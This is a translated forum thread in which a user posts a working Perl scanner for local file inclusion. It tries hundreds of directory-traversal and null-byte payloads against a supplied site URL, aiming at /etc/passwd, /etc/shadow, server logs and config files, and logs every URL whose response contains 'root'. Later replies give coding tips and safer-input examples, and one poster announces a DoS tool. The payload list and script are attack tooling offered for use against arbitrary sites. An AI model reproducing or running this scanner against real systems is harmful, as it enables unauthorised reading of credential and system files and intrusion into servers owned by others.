[Perl] LFI Scanner.

Started by Joey, May 08, 2009, 12:08:10 AM


Joey

It's not professional code, but it gets the job done, lol.
The scan takes a while because there are more than 500 paths to scan...

#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request::Common;

$os="$^O";if ($os eq linux){ $sys="clear";} else { $sys="cls"; system("color 0a"); }
system("$sys");

print "   [+] + =================[***]================= + [+]\n";
print "            --- LFI Scanner coded by Joey ---  \n";
print "                     Mais de 500 paths\n";
print "                  Email: sac\@sjoey.com\n";
print "   [+] + =================[***]================= + [+]\n";
sleep(3);
system("$sys");
print "   [+] + =================[***]================= + [+]\n";
print "            --- LFI Scanner coded by Joey ---  \n";
print "              Digite o site a ser scanneado\n";
print "     Exemplo: http://gazetaonline.globo.com/index.php?id=\n";
print "   [+] + =================[***]================= + [+]\n\n";
print "Site: ";
$site=<STDIN>;
chomp($site);
print "Agora digite o nome do arquivo a ser log. Exemplo: lfi.txt\n";
print "Nome do arquivo: ";
$arq=<STDIN>; chomp($arq);
if ($site !~ /http:\/\//) { $site="http://$site"; }
if ($arq !~ /.txt/ ) { $arq="$arq.txt"; }
system("$sys");
print "   [+] + =================[***]================= + [+]\n";
print "            --- LFI Scanner coded by Joey ---  \n";
print "                    O Scan comecou!\n";
print "          O scan pode demorar alguns minutos...\n";
print "   [+] + =================[***]================= + [+]\n\n";

@patch=('/etc/passwd',
'/etc/shadow',
'/etc/group',
'/etc/security/group',
'/etc/security/passwd',
'/etc/security/user',
'/etc/security/environ',
'/etc/security/limits',
'/usr/lib/security/mkuser.default',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/usr/local/apache/logs/access_ log',
'/usr/local/apache/logs/access. log',
'/var/log/apache/access_log',
'/var/log/apache2/access_log',
'/var/log/apache/access.log',
'/var/log/apache2/access.log',
'/var/log/access_log',
'/var/log/access.log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/var/log/apache/error_log',
'/var/log/apache2/error_log',
'/var/log/apache/error.log',
'/var/log/apache2/error.log',
'/var/log/error_log',
'/var/log/error.log',
'/var/log/httpd/access_log',
'/var/log/httpd/error_log',
'/var/log/httpd/access_log',
'/var/log/httpd/error_log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/usr/local/apache/logs/access_log',
'/usr/local/apache/logs/access.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/usr/local/apache2/logs/access_log',
'/usr/local/apache2/logs/access.log',
'/usr/local/apache2/logs/error_log',
'/usr/local/apache2/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/var/log/httpd/access_log',
'/var/log/httpd/access.log',
'/var/log/httpd/error_log',
'/var/log/httpd/error.log',
'/var/log/apache/access_log',
'/var/log/apache/access.log',
'/var/log/apache/error_log',
'/var/log/apache/error.log',
'/var/log/apache2/access_log',
'/var/log/apache2/access.log',
'/var/log/apache2/error_log',
'/var/log/apache2/error.log',
'/var/log/access_log',
'/var/log/access.log',
'/var/log/error_log',
'/var/log/error.log',
'/opt/lampp/logs/access_log',
'/opt/lampp/logs/error_log',
'/opt/xampp/logs/access_log',
'/opt/xampp/logs/error_log',
'/opt/lampp/logs/access.log',
'/opt/lampp/logs/error.log',
'/opt/xampp/logs/access.log',
'/opt/xampp/logs/error.log',
'/Program Files\Apache Group\Apache\logs\access.log',
'/Program Files\Apache Group\Apache\logs\error.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/usr/local/apache/logs/access_log',
'/usr/local/apache/logs/access.log',
'/var/log/apache/access_log',
'/var/log/apache/access.log',
'/var/log/access_log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/var/log/apache/error_log',
'/var/log/apache/error.log',
'/var/log/access_log',
'/var/log/error_log',
'/usr/local/apache/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf',
'/etc/httpd/conf/httpd.conf',
'/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf',
'/etc/apache2/httpd.conf',
'/usr/local/apache/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf',
'/usr/local/apache/httpd.conf',
'/usr/local/apache2/httpd.conf',
'/usr/local/httpd/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache2/conf/httpd.conf',
'/usr/local/etc/httpd/conf/httpd.conf',
'/usr/apache2/conf/httpd.conf',
'/usr/apache/conf/httpd.conf',
'/usr/local/apps/apache2/conf/httpd.conf',
'/usr/local/apps/apache/conf/httpd.conf',
'/etc/apache/conf/httpd.conf',
'/etc/apache2/conf/httpd.conf',
'/etc/httpd/conf/httpd.conf',
'/etc/http/conf/httpd.conf',
'/etc/apache2/httpd.conf',
'/etc/httpd/httpd.conf',
'/etc/http/httpd.conf',
'/etc/httpd.conf',
'/opt/apache/conf/httpd.conf',
'/opt/apache2/conf/httpd.conf',
'/var/www/conf/httpd.conf',
'/private/etc/httpd/httpd.conf',
'/private/etc/httpd/httpd.conf.default',
'/Volumes/webBackup/opt/apache2/conf/httpd.conf',
'/Volumes/webBackup/private/etc/httpd/httpd.conf',
'/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
'/Program Files\Apache Group\Apache\conf\httpd.conf',
'/Program Files\Apache Group\Apache2\conf\httpd.conf',
'/Program Files\xampp\apache\conf\httpd.conf',
'/usr/local/php/httpd.conf.php',
'/usr/local/php4/httpd.conf.php',
'/usr/local/php5/httpd.conf.php',
'/usr/local/php/httpd.conf',
'/usr/local/php4/httpd.conf',
'/usr/local/php5/httpd.conf',
'/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
'/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
'/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
'/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
'/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
'/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
'/usr/local/etc/apache/vhosts.conf',
'/etc/php.ini',
'/bin/php.ini',
'/etc/httpd/php.ini',
'/usr/lib/php.ini',
'/usr/lib/php/php.ini',
'/usr/local/etc/php.ini',
'/usr/local/lib/php.ini',
'/usr/local/php/lib/php.ini',
'/usr/local/php4/lib/php.ini',
'/usr/local/php5/lib/php.ini',
'/usr/local/apache/conf/php.ini',
'/etc/php4.4/fcgi/php.ini',
'/etc/php4/apache/php.ini',
'/etc/php4/apache2/php.ini',
'/etc/php5/apache/php.ini',
'/etc/php5/apache2/php.ini',
'/etc/php/php.ini',
'/etc/php/php4/php.ini',
'/etc/php/apache/php.ini',
'/etc/php/apache2/php.ini',
'/web/conf/php.ini',
'/usr/local/Zend/etc/php.ini',
'/opt/xampp/etc/php.ini',
'/var/local/www/conf/php.ini',
'/etc/php/cgi/php.ini',
'/etc/php4/cgi/php.ini',
'/etc/php5/cgi/php.ini',
'/php5\php.ini',
'/php4\php.ini',
'/php\php.ini',
'/PHP\php.ini',
'/WINDOWS\php.ini',
'/WINNT\php.ini',
'/apache\php\php.ini',
'/xampp\apache\bin\php.ini',
'/NetServer\bin\stable\apache\php.ini',
'/home2\bin\stable\apache\php.ini',
'/home\bin\stable\apache\php.ini',
'/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
'/usr/local/cpanel/logs',
'/usr/local/cpanel/logs/stats_log',
'/usr/local/cpanel/logs/access_log',
'/usr/local/cpanel/logs/error_log',
'/usr/local/cpanel/logs/license_log',
'/usr/local/cpanel/logs/login_log',
'/usr/local/cpanel/logs/stats_log',
'/var/cpanel/cpanel.config',
'/var/log/mysql/mysql-bin.log',
'/var/log/mysql.log',
'/var/log/mysqlderror.log',
'/var/log/mysql/mysql.log',
'/var/log/mysql/mysql-slow.log',
'/var/mysql.log',
'/var/lib/mysql/my.cnf',
'/etc/mysql/my.cnf',
'/etc/my.cnf',
'/etc/logrotate.d/proftpd',
'/www/logs/proftpd.system.log',
'/var/log/proftpd',
'/etc/proftp.conf',
'/etc/protpd/proftpd.conf',
'/etc/vhcs2/proftpd/proftpd.conf',
'/etc/proftpd/modules.conf',
'/var/log/vsftpd.log',
'/etc/logrotate.d/vsftpd.log',
'/etc/vsftpd/vsftpd.conf',
'/etc/vsftpd.conf',
'/var/log/xferlog',
'/var/adm/log/xferlog',
'/etc/wu-ftpd/ftpaccess',
'/etc/wu-ftpd/ftphosts',
'/etc/wu-ftpd/ftpusers',
'/usr/sbin/pure-config.pl',
'/usr/etc/pure-ftpd.conf',
'/etc/pure-ftpd/pure-ftpd.conf',
'/usr/local/etc/pure-ftpd.conf',
'/usr/local/etc/pureftpd.pdb',
'/usr/local/pureftpd/etc/pureftpd.pdb',
'/usr/local/pureftpd/sbin/pure-config.pl',
'/usr/local/pureftpd/etc/pure-ftpd.conf',
'-/etc/pure-ftpd.conf',
'/etc/pure-ftpd/pure-ftpd.pdb',
'/etc/pureftpd.pdb',
'/etc/pureftpd.passwd',
'/etc/pure-ftpd/pureftpd.pdb',
'/usr/ports/ftp/pure-ftpd/',
'/usr/ports/net/pure-ftpd/',
'/usr/pkgsrc/net/pureftpd/',
'/usr/ports/contrib/pure-ftpd/',
'/var/log/pure-ftpd/pure-ftpd.log',
'/logs/pure-ftpd.log',
'/var/log/pureftpd.log',
'/var/log/ftp-proxy/ftp-proxy.log',
'/var/log/ftp-proxy',
'/var/log/ftplog',
'/etc/logrotate.d/ftp',
'/etc/ftphosts',
'/var/log/exim_mainlog',
'/var/log/exim/mainlog',
'/var/log/maillog',
'/var/log/exim_paniclog',
'/var/log/exim/paniclog',
'/var/log/exim/rejectlog',
'/var/log/exim_rejectlog',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces.log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/error.log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error.log%00',
'../../../../../../../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log%00',
'../../../../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../../../apache2/logs/error.log%00',
'../../../../../../../../../../../../../../../apache2/logs/access.log%00',
'../../../../../../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../../../../../var/www/logs/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../../../../../../var/log/apache/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache2/access.log%00',
'../../../../../../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../../../../../var/www/logs/error.log%00',
'../../../../../../../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../../../../../../var/log/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../../../../../../var/log/apache/error.log%00',
'../../../../../../../../../../../../../../../var/log/apache2/error.log%00',
'../../../../../../../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../../../../../../var/log/error.log%00',
'../../../../../../../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../../../../../../var/log/httpd/access.log%00',
'../../../../../../../../../../../../../../../var/log/httpd/error.log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/access_log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/error_log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/access_log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/error_log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/access.log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/access.log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/error.log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/access.log',
'../../../../../../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../../../../../var/www/logs/access.log',
'../../../../../../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../../../../../../var/log/apache/access.log',
'../../../../../../../../../../../../../../../var/log/apache2/access.log',
'../../../../../../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../../../../../var/www/logs/error.log',
'../../../../../../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../../../../../var/log/access.log',
'../../../../../../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../../../../../../var/log/apache/error.log',
'../../../../../../../../../../../../../../../var/log/apache2/error.log',
'../../../../../../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../../../../../../var/log/error.log',
'../../../../../../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../../../../../../var/log/httpd/access.log',
'../../../../../../../../../../../../../../../var/log/httpd/error.log',
'../../../../../../../../../../../../../../../opt/lampp/logs/access_log',
'../../../../../../../../../../../../../../../opt/lampp/logs/error_log',
'../../../../../../../../../../../../../../../opt/xampp/logs/access_log',
'../../../../../../../../../../../../../../../opt/xampp/logs/error_log',
'../../../../../../../../../../../../../../../opt/lampp/logs/access.log',
'../../../../../../../../../../../../../../../opt/lampp/logs/error.log',
'../../../../../../../../../../../../../../../opt/xampp/logs/access.log',
'../../../../../../../../../../../../../../../opt/xampp/logs/error.log',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../..etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user',
'/etc/passwd%00',
'../etc/passwd%00',
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../etc/passwd%00',
'/etc/passwd',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd');

foreach $patch(@patch) {
$url="$site$patch";
$lwp= LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
$connect = $lwp -> get($url);

if ($connect->content =~ /root/) {
$vuln="sim";
open (arq, ">>$arq");
print arq "$url\n";
close(arq);
} else { $vuln="nao"; }
}

if ($vuln == "sim") {
system("$sys");
print "   [+] + =================[***]================= + [+]\n";
print "            --- LFI Scanner coded by Joey ---  \n";
print "               O Scan foi finalizado...\n";
print "               O log foi salvo em $arq :)\n";
print "   [+] + =================[***]================= + [+]\n";
print "                 [1] - Sair   [2] -  Abrir\n";
print "Digite a opcao: ";
$op=<STDIN>; chomp($op);

if ($op==1) {exit;}
elsif ($op==2) {&open}



sub open {
if (-e "$arq") {
system("start $arq");
} else { print "\nNao foi encontrado nenhuma vulnerabilidade no site"; }
}
}

With a handful of sand I will show you all terror.

Mental_Way

Joey getting started with Perl.. ;)

Very good.. the scripts are getting nice, keep it up...

Who knows, maybe I'll post one of mine one of these days...

That's all..

[RitualistaS GrouP]

"He who knows little quickly reveals it."

guidjos

Nice, congratulations.

Do you mind if I improve your code? I'll post it here. Then you'll see some easier ways of doing a few little things :)

Is that okay?

Joey

Quote from: guidjos on August 02, 2009, 01:32:40 PM
Nice, congratulations.

Do you mind if I improve your code? I'll post it here. Then you'll see some easier ways of doing a few little things :)

Is that okay?

Of course, it's always good to learn new things :]

guidjos

OK, I reworked the code :)

New code: http://guidjos.justfree.com/lfiscan.txt
List of vulnerabilities (read below): http://guidjos.justfree.com/lista.txt

Explanations:

1. When you need to put several elements into one array, such as the test paths in the @patch array of your scanner, it's easier to write

@patch = qw(elemento1 elemento2 elemento3 elemento4);

instead of "@patch = ('elemento1', 'elemento2', 'elemento3', 'elemento4');". Another thing: your program can become outdated, since you filled in the test possibilities inside the code. I changed that; I think it's important for the user to be able to add or remove tests at will. So in the reworked code, the user supplies a list of vulnerabilities to be tested. The program reads the list and stores it in the @patch variable, the same way as before, but now from any file instead of the specific list that will one day be very old. It's not hard to do; you'll understand as soon as you look at how I did it.

2. Be careful with subroutine declarations. You declared the "open" subroutine inside an if statement. The code works, but, let's say, that isn't "healthy". If you go on to learn some other language that isn't a scripting language, when you write functions you'll have to write them outside of any loops and conditionals. You can't declare functions inside functions. I fixed that for you. I declared open() near the header, for the sake of organization. A tip: declare all subroutines in one specific place in the code (try to do it before any call to any of them. That works in few languages).

3. Reading variables

I usually have the user pass all the arguments when running the program (programa.exe arg1 arg2 arg3 etc), instead of reading all of them at run time. But don't worry about that now. I left it the way it is; after all, the program is yours.

But there's an interesting tip in the code. To read variables from the keyboard:

chop ($var = <STDIN>);

Easier, huh? :)

4. Formatting and indentation

Organizing your code is very important. I indented all the code and followed a single formatting standard. Try not to do things like $var = valor and then $var=valor. Follow a uniform standard throughout the code. Organize your code so as to make it more readable. Create logical spacing that identifies each block of code, and where it looks confusing and tangled, add more space. It's easier to fix errors that way.

5. String comparisons

Use

if ($string eq "palavra palavra2") { ... }

instead of if ($string == "palavra"). ==, !=, >, < are numeric operators. For strings, the equivalents are:

numeric   string
==        eq
!=        ne
<         lt
>         gt
<=        le
>=        ge

6. Failure case

If the program finds no vulnerabilities, it simply stops. Always anticipate all the possibilities and exits of your program, and keep the user informed about what is happening. I added an error message for the case where no path works.

That's it, I hope it helps. If you need anything, send me a PM.


guidjoS
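
The difference described in tip 5, as an added example that is not part of guidjos's post or of either version of the script: under `==` the two flag values used in the thread's script ("sim" and "nao") both convert to the number 0 and compare equal, and `use warnings` reports each non-numeric operand. The helper names and sample values are assumptions made for this illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Added illustration; helper names are hypothetical.
# Subroutines are declared once, at top level, before any call.

# Compare with the numeric operator and count the warnings Perl raises.
sub numeric_equal {
    my ($left, $right) = @_;
    my $warned = 0;
    local $SIG{__WARN__} = sub { $warned++ };
    my $equal = ($left == $right) ? 1 : 0;
    return ($equal, $warned);
}

# Compare with the string operator.
sub string_equal {
    my ($left, $right) = @_;
    return ($left eq $right) ? 1 : 0;
}

# Report the outcome of a run, including the case where nothing matched.
sub summary {
    my ($flag) = @_;
    return $flag eq 'sim' ? 'matches were logged' : 'no match was found';
}

# Constructed sample values.
my @cases = (
    [ 'sim', 'sim'  ],
    [ 'nao', 'sim'  ],   # different strings, both convert to 0
    [ '10',  '10.0' ],   # same number, different strings
    [ 'abc', 'ABC'  ],
);

printf "%-6s %-6s %-3s %-3s %s\n", 'left', 'right', '==', 'eq', 'warnings';
for my $case (@cases) {
    my ($left, $right) = @$case;
    my ($num_eq, $warned) = numeric_equal($left, $right);
    printf "%-6s %-6s %-3d %-3d %d\n",
        $left, $right, $num_eq, string_equal($left, $right), $warned;
}

print "flag 'nao': ", summary('nao'), "\n";
```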

Joey

Really nice tips, guidjos. I liked them a lot and I'll use them plenty. I didn't know about tip number 5, I mean... I only knew that "eq" and "ne" existed, and I didn't know there was a difference in when to use them. I've already been using "chop($var = <STDIN>);" in my programs for some time ^^ The arrays were really just out of laziness: I looked up some paths on the internet and they already had the quotes around them, so it was easier to put them in the array hehe. I do think it's better to have it take the paths from a file; with the complete list it even got slow, and sometimes not all of those paths were needed. I had thought about doing that, but I ended up forgetting and never did anything...

Thanks a lot for the tips, man :D

Mateus

The post inspired me; I've just opened the project in NetBeans to make a very simple little DoS tool here =)
I'll post the code in a bit  :-*
H4X with axes 8)

Dkid

Joey, congratulations on your code.

Replace <STDIN> with <>, which is safer.

And whenever the user is going to enter data into your application, try to limit the input to what you really want.

$var =~ /(\d*)/; # in this case we limit the input to decimals (numbers)

You may want to take a look at Perl Critic: http://perlcritic.com/

Dkid
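
Limiting input to what the program expects, as an added example that is not Dkid's code or part of the thread's script: each value is checked against an allow-list pattern anchored to the whole string with `\A` and `\z`, and an accepted file name is opened with three-argument `open` inside a fixed directory. The field names, patterns, helper names and sample inputs are assumptions made for this illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Added illustration; field names, patterns and sample inputs are assumptions.

# Allow-list patterns: one per kind of input the program expects.
my %FIELD = (
    number   => qr/\d{1,9}/,
    log_name => qr/[A-Za-z0-9_-]{1,64}\.txt/,
);

# Return the input only if the WHOLE string matches the pattern.
# \A and \z anchor to the real start and end of the string; unlike $,
# \z does not tolerate a trailing newline.
sub validated {
    my ($input, $kind) = @_;
    my $pattern = $FIELD{$kind} or die "unknown field kind: $kind\n";
    return unless defined $input;
    return $input =~ /\A($pattern)\z/ ? $1 : undef;
}

# Append one line to a validated file name inside a fixed directory.
# Three-argument open with a lexical handle never reads a mode or a
# pipe out of the file name.
sub append_line {
    my ($dir, $name, $line) = @_;
    my $path = File::Spec->catfile($dir, $name);
    open(my $fh, '>>', $path) or die "cannot open $path: $!\n";
    print {$fh} "$line\n";
    close($fh) or die "cannot close $path: $!\n";
    return $path;
}

# Constructed sample inputs.
my %samples = (
    number   => [ '2', '2 ', '12abc', '', "7\n" ],
    log_name => [ 'lfi.txt', 'lfi', '../lfi.txt', 'lfi.txt & calc', "lfi.txt\n" ],
);

# Temporary directory, removed when the program exits.
my $dir = tempdir(CLEANUP => 1);

for my $kind (sort keys %samples) {
    print "$kind\n";
    for my $raw (@{ $samples{$kind} }) {
        (my $shown = $raw) =~ s/\n/\\n/g;
        # An unanchored pattern that can match the empty string succeeds on any input.
        my $unanchored = ($raw =~ /(\d*)/) ? 'matches' : 'no match';
        my $clean      = validated($raw, $kind);
        printf "  %-18s unanchored /(\\d*)/: %-8s anchored: %s\n",
            "'$shown'", $unanchored, defined $clean ? 'accepted' : 'rejected';
        append_line($dir, $clean, 'sample entry')
            if $kind eq 'log_name' && defined $clean;
    }
}
```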